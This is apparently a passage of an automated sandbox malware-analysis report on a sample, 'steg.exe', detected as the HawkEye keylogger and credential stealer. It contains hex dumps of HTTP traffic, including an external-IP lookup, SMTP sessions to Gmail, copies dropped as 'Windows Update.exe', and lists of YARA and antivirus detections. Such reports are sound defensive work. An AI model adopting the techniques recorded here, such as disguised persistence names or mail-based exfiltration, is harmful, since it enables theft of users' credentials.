                                                                                                                  2022-03-22 02:36:16 UTC16INData Raw: 7a 4e 42 7a 30 22 2c 0a 20 20 20 20 20 20 20 20 63 46 50 57 76 3a 20 22 62 22 2c 0a 20 20 20 20 20 20 20 20 63 54 54 69 6d 65 4d 73 3a 20 22 31 30 30 30 22 2c 0a 20 20 20 20 20 20 20 20 63 4c 74 3a 20 22 6e 22 2c 0a 20 20 20 20 20 20 20 20 63 52 71 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 72 75 3a 20 22 61 48 52 30 63 48 4d 36 4c 79 39 33 61 47 46 30 61 58 4e 74 65 57 6c 77 59 57 52 6b 63 6d 56 7a 63 79 35 6a 62 32 30 76 22 2c 0a 20 20 20 20 20 20 20 20 20 20 72 61 3a 20 22 22 2c 0a 20 20 20 20 20 20 20 20 20 20 72 6d 3a 20 22 52 30 56 55 22 2c 0a 20 20 20 20 20 20 20 20 20 20 64 3a 20 22 7a 74 35 72 68 38 57 4d 56 6b 43 73 63 62 48 55 41 62 57 4c 78 31 59 42 6d 58 75 68 44 4b 4f 5a 48 6d 62 6d 32 71 4d 6d 58 65 31 35 37 70 6f 70 34 58 34 37 64 38 44 74
                                                                                                                  Data Ascii: zNBz0", cFPWv: "b", cTTimeMs: "1000", cLt: "n", cRq: { ru: "aHR0cHM6Ly93aGF0aXNteWlwYWRkcmVzcy5jb20v", ra: "", rm: "R0VU", d: "zt5rh8WMVkCscbHUAbWLx1YBmXuhDKOZHmbm2qMmXe157pop4X47d8Dt
                                                                                                                  2022-03-22 02:36:16 UTC18INData Raw: 36 39 70 78 3b 20 6d 61 72 67 69 6e 3a 20 20 61 75 74 6f 3b 7d 0a 20 20 23 63 66 2d 77 72 61 70 70 65 72 20 23 63 66 2d 70 6c 65 61 73 65 2d 77 61 69 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 0a 20 20 2e 61 74 74 72 69 62 75 74 69 6f 6e 20 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 32 70 78 3b 7d 0a 20 20 2e 62 75 62 62 6c 65 73 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 38 32 32 30 3b 20 77 69 64 74 68 3a 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 32 30 70 78 3b 20 6d 61 72 67 69 6e 3a 32 70 78 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 30 30 25 3b 20 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 20 7d 0a 20 20 23 63 66 2d 77 72 61 70 70 65 72 20 23 63 68 61 6c 6c 65 6e 67 65 2d 66 6f
                                                                                                                  Data Ascii: 69px; margin: auto;} #cf-wrapper #cf-please-wait{text-align:center} .attribution {margin-top: 32px;} .bubbles { background-color: #f58220; width:20px; height: 20px; margin:2px; border-radius:100%; display:inline-block; } #cf-wrapper #challenge-fo
                                                                                                                  2022-03-22 02:36:16 UTC19INData Raw: 20 20 20 20 20 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 20 63 66 2d 63 61 70 74 63 68 61 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 73 20 74 77 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 68 69 67 68 6c 69 67 68 74 2d 69 6e 76 65 72 73 65 20 63 66 2d 66 6f 72 6d 2d 73 74 61 63 6b 65 64 22
                                                                                                                  Data Ascii: <div class="cf-section cf-highlight cf-captcha-container"> <div class="cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <div class="cf-highlight-inverse cf-form-stacked"
                                                                                                                  2022-03-22 02:36:16 UTC20INData Raw: 4e 72 65 72 5a 56 58 66 36 55 57 6a 59 4b 72 49 5f 32 2d 34 46 38 68 38 49 4d 41 34 51 37 7a 6f 4c 6d 6a 63 33 58 47 56 71 58 49 63 70 52 5a 75 34 51 62 35 42 6f 32 6c 39 6e 64 71 37 5a 61 6f 58 51 61 36 67 51 4b 79 41 71 49 57 74 6d 4d 67 36 6f 32 37 56 33 47 58 74 4e 6d 6d 49 49 44 4f 6c 4b 71 41 59 32 43 73 43 55 57 7a 6d 43 7a 54 6a 6f 44 74 45 56 38 53 78 77 42 76 38 4e 54 58 77 32 50 67 46 75 70 39 55 4a 44 6f 59 33 54 4b 75 6e 6a 75 35 71 57 6f 73 32 62 71 73 4a 4b 58 57 6f 54 78 75 48 4a 55 35 35 75 46 62 57 61 48 72 57 39 39 74 52 69 77 4c 79 30 44 52 54 4b 32 74 7a 5a 2d 43 63 56 74 51 53 72 6f 6c 64 55 38 69 56 74 37 37 46 68 7a 36 6d 72 78 52 66 49 67 36 65 37 30 54 50 66 42 64 4d 39 63 61 37 2d 77 49 72 2d 74 41 6f 37 41 37 73 4b 5a 43 78 64
                                                                                                                  Data Ascii: NrerZVXf6UWjYKrI_2-4F8h8IMA4Q7zoLmjc3XGVqXIcpRZu4Qb5Bo2l9ndq7ZaoXQa6gQKyAqIWtmMg6o27V3GXtNmmIIDOlKqAY2CsCUWzmCzTjoDtEV8SxwBv8NTXw2PgFup9UJDoY3TKunju5qWos2bqsJKXWoTxuHJU55uFbWaHrW99tRiwLy0DRTK2tzZ-CcVtQSroldU8iVt77Fhz6mrxRfIg6e70TPfBdM9ca7-wIr-tAo7A7sKZCxd
                                                                                                                  2022-03-22 02:36:16 UTC22INData Raw: 4c 30 79 53 7a 6f 68 4e 6b 77 65 38 41 4c 77 36 4a 33 66 46 4f 4a 53 50 2b 36 6f 53 34 48 76 6d 34 6e 33 37 57 38 54 33 64 54 7a 2b 4a 52 51 6a 71 52 46 64 78 67 61 66 61 75 4d 48 33 43 48 49 6f 37 75 48 47 49 59 78 57 73 51 34 38 55 72 79 70 2b 75 76 35 68 41 43 56 55 70 66 6b 6d 35 59 42 50 66 6b 4a 70 48 71 74 76 48 48 78 36 6e 43 45 45 6e 49 7a 49 77 4b 4e 58 6e 68 2f 6d 53 45 68 79 4d 68 41 45 50 47 69 66 66 45 6d 4d 2f 6c 37 71 61 69 73 39 73 72 72 2b 4d 41 74 78 63 7a 48 45 50 61 41 4e 71 37 45 52 79 4c 76 38 4a 4a 33 37 59 51 4f 38 46 75 75 61 46 30 42 50 58 41 78 4b 67 62 77 35 65 58 31 65 75 6c 76 42 7a 4a 6e 66 36 74 6f 53 2b 68 77 63 77 6c 2f 33 65 42 49 78 6f 4e 55 73 33 68 4d 73 63 43 55 54 31 62 61 50 51 6d 59 30 6e 66 68 73 58 50 4a 56 66
                                                                                                                  Data Ascii: L0ySzohNkwe8ALw6J3fFOJSP+6oS4Hvm4n37W8T3dTz+JRQjqRFdxgafauMH3CHIo7uHGIYxWsQ48Uryp+uv5hACVUpfkm5YBPfkJpHqtvHHx6nCEEnIzIwKNXnh/mSEhyMhAEPGiffEmM/l7qais9srr+MAtxczHEPaANq7ERyLv8JJ37YQO8FuuaF0BPXAxKgbw5eX1eulvBzJnf6toS+hwcwl/3eBIxoNUs3hMscCUT1baPQmY0nfhsXPJVf
                                                                                                                  2022-03-22 02:36:16 UTC23INData Raw: 65 61 73 65 20 74 75 72 6e 20 4a 61 76 61 53 63 72 69 70 74 20 6f 6e 20 61 6e 64 20 72 65 6c 6f 61 64 20 74 68 65 20 70 61 67 65 2e 3c 2f 68 31 3e 0a 20 20 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 6e 6f 2d 63 6f 6f 6b 69 65 2d 77 61 72 6e 69 6e 67 22 20 63 6c 61 73 73 3d 22 63 6f 6f 6b 69 65 2d 77 61 72 6e 69 6e 67 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 74 75 72 6e 5f 6f 6e 5f 63 6f 6f 6b 69 65 73 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 0a 20 20 20 20 20 20 3c 70 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 74 75 72 6e 5f 6f 6e 5f 63 6f 6f 6b 69 65 73 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 62 64 32 34 32 36 3b 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 43 6f
                                                                                                                  Data Ascii: ease turn JavaScript on and reload the page.</h1> </noscript> <div id="no-cookie-warning" class="cookie-warning" data-translate="turn_on_cookies" style="display:none"> <p data-translate="turn_on_cookies" style="color:#bd2426;">Please enable Co
                                                                                                                  2022-03-22 02:36:16 UTC24INData Raw: 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 72 6b 6a 73 29 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 63 70 6f 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0a 20 20 20 20 20 20 20 20 63 70 6f 2e 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3b 0a 20 20 20 20 20 20 20 20 63 70 6f 2e 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 68 2f 62 2f 6f 72 63 68 65 73 74 72 61 74 65 2f 6d 61 6e 61 67 65 64 2f 76 31 3f 72 61 79 3d 36 65 66 62 38 39 65 61 39 39 35 32 39 30 36 34 22 3b 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74
                                                                                                                  Data Ascii: document.body.appendChild(trkjs); var cpo=document.createElement('script'); cpo.type='text/javascript'; cpo.src="/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=6efb89ea99529064"; window._cf_chl_opt
                                                                                                                  2022-03-22 02:36:16 UTC26INData Raw: 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 73 20 74 77 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 77 68 79 5f 63 61 70 74 63 68 61 5f 68 65 61 64 6c 69 6e 65 22 3e 57 68 79 20 64 6f 20 49 20 68 61 76 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 20 61 20 43 41 50 54 43 48 41 3f 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 77 68 79 5f 63 61 70 74 63 68 61 5f 64 65 74 61 69 6c 22
                                                                                                                  Data Ascii: "cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2 data-translate="why_captcha_headline">Why do I have to complete a CAPTCHA?</h2> <p data-translate="why_captcha_detail"
                                                                                                                  2022-03-22 02:36:16 UTC27INData Raw: 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 59 6f 75 72 20 49 50 3c 2f 73 70 61 6e 3e 3a 20 31 30 32 2e 31 32 39 2e 31 34 33 2e 39 33 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d
                                                                                                                  Data Ascii: n> <span class="cf-footer-separator sm:hidden">&bull;</span> <span class="cf-footer-item sm:block sm:mb-1"><span>Your IP</span>: 102.129.143.93</span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span class="cf-footer-item sm
                                                                                                                  2022-03-22 02:36:16 UTC28INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  SMTP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                  Mar 22, 2022 03:35:52.781536102 CET58749771108.177.127.109192.168.2.4220 smtp.gmail.com ESMTP e5-20020a170906374500b006d5825520a7sm7639105ejc.71 - gsmtp
                                                                                                                  Mar 22, 2022 03:35:52.781826973 CET49771587192.168.2.4108.177.127.109EHLO 980108
                                                                                                                  Mar 22, 2022 03:35:52.813298941 CET58749771108.177.127.109192.168.2.4250-smtp.gmail.com at your service, [102.129.143.93]
                                                                                                                  250-SIZE 35882577
                                                                                                                  250-8BITMIME
                                                                                                                  250-STARTTLS
                                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                                  250-PIPELINING
                                                                                                                  250-CHUNKING
                                                                                                                  250 SMTPUTF8
                                                                                                                  Mar 22, 2022 03:35:52.813864946 CET49771587192.168.2.4108.177.127.109STARTTLS
                                                                                                                  Mar 22, 2022 03:35:52.840512037 CET58749771108.177.127.109192.168.2.4220 2.0.0 Ready to start TLS
                                                                                                                  Mar 22, 2022 03:36:18.859519005 CET58749780108.177.127.109192.168.2.4220 smtp.gmail.com ESMTP f17-20020a056402355100b0041925e80963sm3788897edd.41 - gsmtp
                                                                                                                  Mar 22, 2022 03:36:18.859970093 CET49780587192.168.2.4108.177.127.109EHLO 980108
                                                                                                                  Mar 22, 2022 03:36:18.890105009 CET58749780108.177.127.109192.168.2.4250-smtp.gmail.com at your service, [102.129.143.93]
                                                                                                                  250-SIZE 35882577
                                                                                                                  250-8BITMIME
                                                                                                                  250-STARTTLS
                                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                                  250-PIPELINING
                                                                                                                  250-CHUNKING
                                                                                                                  250 SMTPUTF8
                                                                                                                  Mar 22, 2022 03:36:18.890435934 CET49780587192.168.2.4108.177.127.109STARTTLS
                                                                                                                  Mar 22, 2022 03:36:18.917603970 CET58749780108.177.127.109192.168.2.4220 2.0.0 Ready to start TLS

                                                                                                                  Statistics

                                                                                                                  CPU Usage

                                                                                                                  Click to jump to process

                                                                                                                  Memory Usage

                                                                                                                  Click to jump to process

                                                                                                                  High Level Behavior Distribution

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Behavior

                                                                                                                  Click to jump to process

                                                                                                                  System Behavior

                                                                                                                  General

                                                                                                                  Target ID:0
                                                                                                                  Start time:03:35:23
                                                                                                                  Start date:22/03/2022
                                                                                                                  Path:C:\Users\user\Desktop\steg.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\steg.exe"
                                                                                                                  Imagebase:0xf80000
                                                                                                                  File size:1167872 bytes
                                                                                                                  MD5 hash:30747BB37997B54D37BAE65AE590B7E8
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_EmailPasswordDump_Tool, Description: Yara detected EmailPasswordDump Tool by SecurityXploded, Source: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BrowserPasswordDump_Tool, Description: Yara detected BrowserPasswordDump Tool by SecurityXploded, Source: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_EmailPasswordDump_Tool, Description: Yara detected EmailPasswordDump Tool by SecurityXploded, Source: 00000000.00000000.234986567.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.234986567.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000000.234986567.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BrowserPasswordDump_Tool, Description: Yara detected BrowserPasswordDump Tool by SecurityXploded, Source: 00000000.00000000.234986567.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_EmailPasswordDump_Tool, Description: Yara detected EmailPasswordDump Tool by SecurityXploded, Source: 00000000.00000003.272692370.00000000017E4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000003.272692370.00000000017E4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:low

                                                                                                                  General

                                                                                                                  Target ID:4
                                                                                                                  Start time:03:35:42
                                                                                                                  Start date:22/03/2022
                                                                                                                  Path:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\Windows Update.exe"
                                                                                                                  Imagebase:0x10000
                                                                                                                  File size:1167872 bytes
                                                                                                                  MD5 hash:30747BB37997B54D37BAE65AE590B7E8
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_EmailPasswordDump_Tool, Description: Yara detected EmailPasswordDump Tool by SecurityXploded, Source: 00000004.00000000.276220199.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000000.276220199.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000004.00000000.276220199.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BrowserPasswordDump_Tool, Description: Yara detected BrowserPasswordDump Tool by SecurityXploded, Source: 00000004.00000000.276220199.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_EmailPasswordDump_Tool, Description: Yara detected EmailPasswordDump Tool by SecurityXploded, Source: 00000004.00000003.292924659.0000000005EEC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000004.00000003.292924659.0000000005EEC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_EmailPasswordDump_Tool, Description: Yara detected EmailPasswordDump Tool by SecurityXploded, Source: 00000004.00000000.278862064.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000000.278862064.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000004.00000000.278862064.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BrowserPasswordDump_Tool, Description: Yara detected BrowserPasswordDump Tool by SecurityXploded, Source: 00000004.00000000.278862064.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_EmailPasswordDump_Tool, Description: Yara detected EmailPasswordDump Tool by SecurityXploded, Source: 00000004.00000000.276722207.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000000.276722207.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000004.00000000.276722207.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BrowserPasswordDump_Tool, Description: Yara detected BrowserPasswordDump Tool by SecurityXploded, Source: 00000004.00000000.276722207.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000004.00000002.302645603.0000000002B8F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_EmailPasswordDump_Tool, Description: Yara detected EmailPasswordDump Tool by SecurityXploded, Source: 00000004.00000001.280458737.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BrowserPasswordDump_Tool, Description: Yara detected BrowserPasswordDump Tool by SecurityXploded, Source: 00000004.00000001.280458737.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_EmailPasswordDump_Tool, Description: Yara detected EmailPasswordDump Tool by SecurityXploded, Source: 00000004.00000000.280199834.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000000.280199834.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000004.00000000.280199834.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BrowserPasswordDump_Tool, Description: Yara detected BrowserPasswordDump Tool by SecurityXploded, Source: 00000004.00000000.280199834.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_EmailPasswordDump_Tool, Description: Yara detected EmailPasswordDump Tool by SecurityXploded, Source: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BrowserPasswordDump_Tool, Description: Yara detected BrowserPasswordDump Tool by SecurityXploded, Source: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: SecurityXploded_Producer_String, Description: Detects hacktools by SecurityXploded, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Florian Roth
                                                                                                                  • Rule: JoeSecurity_EmailPasswordDump_Tool, Description: Yara detected EmailPasswordDump Tool by SecurityXploded, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BrowserPasswordDump_Tool, Description: Yara detected BrowserPasswordDump Tool by SecurityXploded, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Joe Security
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 88%, ReversingLabs
                                                                                                                  Reputation:low

                                                                                                                  General

                                                                                                                  Target ID:11
                                                                                                                  Start time:03:35:51
                                                                                                                  Start date:22/03/2022
                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:dw20.exe -x -s 2708
                                                                                                                  Imagebase:0x10000000
                                                                                                                  File size:33936 bytes
                                                                                                                  MD5 hash:8D10DA8A3E11747E51F23C882C22BBC3
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Target ID:12
                                                                                                                  Start time:03:36:02
                                                                                                                  Start date:22/03/2022
                                                                                                                  Path:C:\Users\user\AppData\Roaming\WindowsUpdate.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\WindowsUpdate.exe"
                                                                                                                  Imagebase:0x2c0000
                                                                                                                  File size:1167872 bytes
                                                                                                                  MD5 hash:30747BB37997B54D37BAE65AE590B7E8
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_EmailPasswordDump_Tool, Description: Yara detected EmailPasswordDump Tool by SecurityXploded, Source: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BrowserPasswordDump_Tool, Description: Yara detected BrowserPasswordDump Tool by SecurityXploded, Source: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_EmailPasswordDump_Tool, Description: Yara detected EmailPasswordDump Tool by SecurityXploded, Source: 0000000C.00000003.324470514.0000000000915000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000C.00000003.324470514.0000000000915000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_EmailPasswordDump_Tool, Description: Yara detected EmailPasswordDump Tool by SecurityXploded, Source: 0000000C.00000000.319176501.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000000.319176501.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000C.00000000.319176501.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BrowserPasswordDump_Tool, Description: Yara detected BrowserPasswordDump Tool by SecurityXploded, Source: 0000000C.00000000.319176501.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                  • Rule: SecurityXploded_Producer_String, Description: Detects hacktools by SecurityXploded, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: Florian Roth
